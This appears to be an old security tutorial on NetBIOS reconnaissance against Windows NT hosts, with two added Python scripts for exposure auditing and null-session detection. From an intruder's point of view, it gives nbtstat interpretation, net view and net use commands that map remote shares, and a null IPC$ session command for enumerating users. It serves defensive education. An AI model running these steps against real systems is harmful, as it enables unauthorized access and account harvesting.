When targeting a given network, the first thing an intruder would do would be to port scan the remote machine or network. A lot of information can be gathered by a simple port scan, but what the intruder is looking for is an open port 139, the default NetBIOS port. It's surprising how methodical an attack can become based on the open ports of a target machine. You should understand that it is the norm for an NT machine to display different open ports than a Unix machine.

Intruders learn to view a portscan and tell whether it is an NT or Unix machine with fairly accurate results. Obviously there are some exceptions to this, but generally it can be done.

Recently, several tools have been released to fingerprint a machine remotely, but this functionality has not been made available for NT.

Information gathering with NetBIOS can be a fairly easy thing to accomplish, albeit a bit time consuming. NetBIOS is generally considered a bulky protocol with high overhead and tends to be slow, which is where the consumption of time comes in.

If the portscan reports that port 139 is open on the target machine, a natural process follows. The first step is to issue an NBTSTAT command.

The NBTSTAT command can be used to query network machines concerning NetBIOS information. It can also be useful for purging the NetBIOS cache and preloading the LMHOSTS file. This one command can be extremely useful when performing security audits.

Interpreting the information can reveal more than one might think.

Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]

Switches
   -a    Lists the remote computer's name table given its host name.
   -A    Lists the remote computer's name table given its IP address.
   -c    Lists the remote name cache including the IP addresses.
   -n    Lists local NetBIOS names.
   -r    Lists names resolved by broadcast and via WINS.
   -R    Purges and reloads the remote cache name table.
   -S    Lists sessions table with the destination IP addresses.
   -s    Lists sessions table conversions.

The column headings generated by NBTSTAT have the following meanings:

Input
     Number of bytes received.
Output
     Number of bytes sent.
In/Out
     Whether the connection is from the computer (outbound)
     or from another system to the local computer (inbound).
Life
     The remaining time that a name table cache entry will "live"
     before your computer purges it.
Local Name
     The local NetBIOS name given to the connection.
Remote Host
     The name or IP address of the remote host.
Type
     A name can have one of two types: unique or group.
     The last byte of the 16 character NetBIOS name often
     means something because the same name can be present
     multiple times on the same computer. This shows the last
     byte of the name converted into hex.
State
     Your NetBIOS connections will be shown in one of the
     following "states":

State                   Meaning

Accepting         An incoming connection is in process.

Associated        The endpoint for a connection has been created
                      and your computer has associated it with an IP
                      address.

Connected         This is a good state! It means you're connected
                       to the remote resource.

Connecting        Your session is trying to resolve the name-to-IP
                       address mapping of the destination resource.

Disconnected      Your computer requested a disconnect, and it is
                        waiting for the remote computer to do so.

Disconnecting     Your connection is ending.

Idle              The remote computer has been opened in the current
                   session, but is currently not accepting connections.

Inbound              An inbound session is trying to connect.

Listening            The remote computer is available.

Outbound             Your session is creating the TCP connection.

Reconnecting      If your connection failed on the first attempt,
                        it will display this state as it tries to reconnect.

Here is a sample NBTSTAT response of my NT Box:

C:\>nbtstat -A 195.171.236.139

       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
MR_B10NDE      <00>  UNIQUE      Registered
WINSEKURE LABS <00>  GROUP       Registered
MR_B10NDE      <03>  UNIQUE      Registered
MR_B10NDE      <20>  UNIQUE      Registered
WINSEKURE LABS <1E>  GROUP       Registered

MAC Address = 44-45-53-54-00-00

Using the table below, what can you learn about the machine?

Name              Number   Type   Usage
=========================================================================
                  00       U      Workstation Service
                  01       U      Messenger Service
<\\_MSBROWSE_>    01       G      Master Browser
                  03       U      Messenger Service
                  06       U      RAS Server Service
                  1F       U      NetDDE Service
                  20       U      File Server Service
                  21       U      RAS Client Service
                  22       U      Exchange Interchange
                  23       U      Exchange Store
                  24       U      Exchange Directory
                  30       U      Modem Sharing Server Service
                  31       U      Modem Sharing Client Service
                  43       U      SMS Client Remote Control
                  44       U      SMS Admin Remote Control Tool
                  45       U      SMS Client Remote Chat
                  46       U      SMS Client Remote Transfer
                  4C       U      DEC Pathworks TCPIP Service
                  52       U      DEC Pathworks TCPIP Service
                  87       U      Exchange MTA
                  6A       U      Exchange IMC
                  BE       U      Network Monitor Agent
                  BF       U      Network Monitor Apps
                  03       U      Messenger Service
                  00       G      Domain Name
                  1B       U      Domain Master Browser
                  1C       G      Domain Controllers
                  1D       U      Master Browser
                  1E       G      Browser Service Elections
                  1C       G      Internet Information Server
                  00       U      Internet Information Server
                  [2B]     U      Lotus Notes Server
IRISMULTICAST     [2F]     G      Lotus Notes
IRISNAMESERVER    [33]     G      Lotus Notes
Forte_$ND800ZA    [20]     U      DCA Irmalan Gateway Service

Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.

Group (G): A normal group; the single name may exist with many IP addresses.

Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.

Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.

Domain Name (D): New in NT 4.0.

An intruder could use the table above and the output from an nbtstat against your machines to begin gathering information about them. With this information an intruder can tell, to an extent, what services are running on the target machine and sometimes what software packages have been installed. Traditionally, every service or major software package comes with its share of vulnerabilities, so this type of information is certainly useful to an intruder.
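The same interpretation can be automated on the defender's side, so that an audit of your own hosts reports what an outsider would learn from their name tables. The following Python script is an added example, not part of the article or of any tool it names: it parses `nbtstat -A` output, labels each entry with the service from the suffix table (using the first meaning the table gives for each suffix/type pair), and summarizes the computer name, domain, whether file sharing (`<20>`) is advertised, and which `<03>` names would expose a logged-on user. The sample input is the article's own nbtstat output, embedded as a string.

```python
import re

# Suffix/type -> service, from the article's table (first meaning listed for each pair).
NETBIOS_SUFFIXES = {
    ("00", "UNIQUE"): "Workstation Service",
    ("00", "GROUP"): "Domain Name",
    ("01", "UNIQUE"): "Messenger Service",
    ("03", "UNIQUE"): "Messenger Service",
    ("06", "UNIQUE"): "RAS Server Service",
    ("1B", "UNIQUE"): "Domain Master Browser",
    ("1C", "GROUP"): "Domain Controllers",
    ("1D", "UNIQUE"): "Master Browser",
    ("1E", "GROUP"): "Browser Service Elections",
    ("1F", "UNIQUE"): "NetDDE Service",
    ("20", "UNIQUE"): "File Server Service",
    ("21", "UNIQUE"): "RAS Client Service",
    ("2B", "UNIQUE"): "Lotus Notes Server",
    ("6A", "UNIQUE"): "Exchange IMC",
    ("87", "UNIQUE"): "Exchange MTA",
    ("BE", "UNIQUE"): "Network Monitor Agent",
    ("BF", "UNIQUE"): "Network Monitor Apps",
}

# One name-table row: name (may contain spaces), <suffix>, type, status.
ENTRY_RE = re.compile(
    r'^(?P<name>.+?)\s+<(?P<suffix>[0-9A-Fa-f]{2})>\s+(?P<type>UNIQUE|GROUP)\s+(?P<status>\S+)$'
)
MAC_RE = re.compile(r'MAC Address\s*=\s*([0-9A-Fa-f-]{17})')

# Sample input: the article's own nbtstat -A output.
SAMPLE_NBTSTAT = """\
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
MR_B10NDE      <00>  UNIQUE      Registered
WINSEKURE LABS <00>  GROUP       Registered
MR_B10NDE      <03>  UNIQUE      Registered
MR_B10NDE      <20>  UNIQUE      Registered
WINSEKURE LABS <1E>  GROUP       Registered

MAC Address = 44-45-53-54-00-00
"""


def parse_nbtstat(text):
    """Return (entries, mac) from nbtstat -A output; header/rule lines are skipped."""
    entries, mac = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = ENTRY_RE.match(line)
        if m:
            entries.append({"name": m["name"].strip(), "suffix": m["suffix"].upper(),
                            "type": m["type"], "status": m["status"]})
            continue
        mm = MAC_RE.search(line)
        if mm:
            mac = mm.group(1).upper()
    return entries, mac


def label_services(entries):
    """Attach the service meaning of each (suffix, type) pair to its entry."""
    return [(e["name"], e["suffix"], NETBIOS_SUFFIXES.get((e["suffix"], e["type"]), "unknown"))
            for e in entries]


def exposure_report(text):
    """Summarize what a remote nbtstat query reveals about the host."""
    entries, mac = parse_nbtstat(text)
    report = {"mac": mac, "computer": None, "domains": [], "file_sharing": False,
              "messenger_names": [], "domain_controller": False,
              "services": label_services(entries)}
    for e in entries:
        key = (e["suffix"], e["type"])
        if key == ("00", "UNIQUE") and report["computer"] is None:
            report["computer"] = e["name"]          # workstation name
        elif key == ("00", "GROUP"):
            report["domains"].append(e["name"])     # domain / workgroup name
        elif key == ("20", "UNIQUE"):
            report["file_sharing"] = True           # file server service advertised
        elif key == ("03", "UNIQUE"):
            report["messenger_names"].append(e["name"])  # may be a logged-on user
        elif key == ("1C", "GROUP"):
            report["domain_controller"] = True
    return report


if __name__ == "__main__":
    for line in exposure_report(SAMPLE_NBTSTAT).items():
        print(*line)
```

A `<20>` entry on a host reachable from outside is the finding to act on first, since it is the service that the share enumeration and `net use` steps later in the article depend on.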

The next step for an intruder would be to try and list the open shares on the given computer using the net view command. Here is an example of the net view command used against my box, with the open shares C:\ and C:\MP3S\:

C:\>net view \\195.171.236.139
Shared resources at \\195.171.236.139

Sharename    Type         Comment
-----------------------------------------------------------------
C            Disk         Drive C:\
MP3S         Disk         My collection of MP3s
The command was completed successfully.

This information would give the intruder a list of shares, which he would then use in conjunction with the net use command, a command used to enable a computer to map a share to its local drive. Below is an example of how an intruder would map the C share to a local G: drive, which he could then browse:

C:\>net use G: \\195.171.236.139\C
The command was completed successfully.

C:\>G:

G:\>

However, if the intruder was targeting a large network rather than a single remote computer, the next logical step would be to glean possible usernames from the remote machine.

A network login consists of two parts, a username and a password. Once an intruder has what he knows to be a valid list of usernames, he has half of several valid logins.

Now, using the nbtstat command, the intruder can get the login name of anyone logged on locally at that machine. In the results from the nbtstat command, entries with the <03> identifier are usernames or computer names. Gleaning usernames can also be accomplished through a null IPC session and the SID tools.

The IPC$ (Inter-Process Communication) share is a standard hidden share on an NT machine which is mainly used for server to server communication. NT machines were designed to connect to each other and obtain different types of necessary information through this share. As with many design features in any operating system, intruders have learned to use this feature for their own purposes. By connecting to this share an intruder has, for all technical purposes, a valid connection to your server. By connecting to this share as null, the intruder has been able to establish this connection without providing it with credentials.

To connect to the IPC$ share as null, an intruder would issue the following command from a command prompt:

c:\>net use \\[ip address of target machine]\ipc$ "" /user:""

If the connection is successful, the intruder could do a number of things other than gleaning a user list, but let's start with that first. As mentioned earlier, this technique requires a null IPC session and the SID tools. Written by Evgenii Rudnyi, the SID tools come in two different parts, User2sid and Sid2user. User2sid will take an account name or group and give you the corresponding SID. Sid2user will take a SID and give you the name of the corresponding user or group. As a stand-alone tool, this process is manual and very time consuming. Userlist.pl is a perl script written by Mnemonix that will automate this process of SID grinding, which drastically cuts down on the time it would take an intruder to glean this information.

At this point, the intruder knows what services are running on the remote machine, which major software packages have been installed (within limits), and has a list of valid usernames and groups for that machine. Although this may seem like a ton of information for an outsider to have about your network, the null IPC session has opened other venues for information gathering. The Rhino9 team has been able to retrieve the entire native security policy for the remote machine.

Such things as account lockout, minimum password length, password age cycling, password uniqueness settings as well as every user, the groups they belong to and the individual domain restrictions for that user, all through a null IPC session. This information gathering ability will appear in Rhino9's soon to be released Leviathan tool. Some of the tools available now that can be used to gather more information via the IPC null session will be discussed below.

With the null IPC session, an intruder could also obtain a list of network shares that may not otherwise be obtainable. For obvious reasons, an intruder would like to know what network shares you have available on your machines. For this information gathering, the standard net view command is used, as follows:

c:\>net view \\[ip address of remote machine]

Depending on the security policy of the target machine, this list may or may not be denied. Take the example below (ip address has been left out for obvious reasons):

C:\>net view \\0.0.0.0
System error 5 has occurred.

Access is denied.

C:\>net use \\0.0.0.0\ipc$ "" /user:""
The command completed successfully.

C:\>net view \\0.0.0.0
Shared resources at \\0.0.0.0

Share name   Type         Used as  Comment

---------------------------------------------------------------------
Accelerator  Disk                  Agent Accelerator share for Seagate backup
Inetpub      Disk
mirc         Disk
NETLOGON     Disk                  Logon server share
www_pages    Disk
The command completed successfully.

As you can see, the list of shares on that server was not available until after the IPC null session had been established. At this point you may begin to realize just how dangerous this IPC connection can be, but the IPC techniques that are known to us now are actually very basic. The possibilities that are presented with the IPC share are just beginning to be explored.

Once this list of shares had been given, the intruder could then proceed to issue the net use commands as described above.
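The null session and the share enumeration that follows it leave a trace on the server, and that trace is what a defender should alert on. The following Python script is an added example, not from the article: it reads a constructed, simplified one-line rendering of Windows Security events 4624 (an account was logged on) and 5140 (a network share object was accessed), flags network logons by ANONYMOUS LOGON and anonymous access to the IPC$ share, and separates source addresses inside an assumed internal range from outside ones. The line layout and the internal range are assumptions; the field names follow those two events.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample: simplified one-line renderings of events 4624 and 5140.
SAMPLE_EVENTS = r'''
2011-11-13T10:02:01 EventID=4624 LogonType=3 AccountName="ANONYMOUS LOGON" SourceAddress=203.0.113.9
2011-11-13T10:02:01 EventID=5140 AccountName="ANONYMOUS LOGON" ShareName="\\*\IPC$" SourceAddress=203.0.113.9
2011-11-13T10:02:03 EventID=4624 LogonType=3 AccountName="jsmith" SourceAddress=10.0.0.12
2011-11-13T10:02:04 EventID=5140 AccountName="jsmith" ShareName="\\*\NETLOGON" SourceAddress=10.0.0.12
2011-11-13T10:02:05 EventID=4624 LogonType=3 AccountName="ANONYMOUS LOGON" SourceAddress=10.0.0.5
'''

INTERNAL_NETS = [ip_network("10.0.0.0/8")]  # assumed internal address range
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')  # key=value or key="quoted value"


def parse_event(line):
    """Split one line into a dict of fields plus its leading timestamp."""
    ts, _, rest = line.partition(" ")
    fields = {k: (q if q else u) for k, q, u in FIELD_RE.findall(rest)}
    fields["time"] = ts
    return fields


def is_internal(addr):
    """True when addr parses as an IP inside one of the assumed internal ranges."""
    try:
        ip = ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in INTERNAL_NETS)


def detect_null_sessions(text):
    """Return alerts for anonymous network logons and anonymous IPC$ access."""
    alerts = []
    for line in text.strip().splitlines():
        ev = parse_event(line)
        if ev.get("AccountName", "").upper() != "ANONYMOUS LOGON":
            continue
        src = ev.get("SourceAddress", "")
        # 4624 with logon type 3 (network) by ANONYMOUS LOGON is the null session itself.
        if ev.get("EventID") == "4624" and ev.get("LogonType") == "3":
            rule = "internal_null_session" if is_internal(src) else "external_null_session"
            alerts.append({"rule": rule, "source": src, "time": ev["time"]})
        # 5140 on IPC$ by ANONYMOUS LOGON is the share being used for enumeration.
        elif ev.get("EventID") == "5140" and ev.get("ShareName", "").upper().endswith("IPC$"):
            alerts.append({"rule": "anonymous_ipc_share_access", "source": src, "time": ev["time"]})
    return alerts


if __name__ == "__main__":
    for a in detect_null_sessions(SAMPLE_EVENTS):
        print(a)
```

Anonymous logons from inside the network may be legitimate on older domains, so the internal/external split keeps the rule usable; an external anonymous logon followed by IPC$ access from the same address is the sequence the article walks through and should page someone.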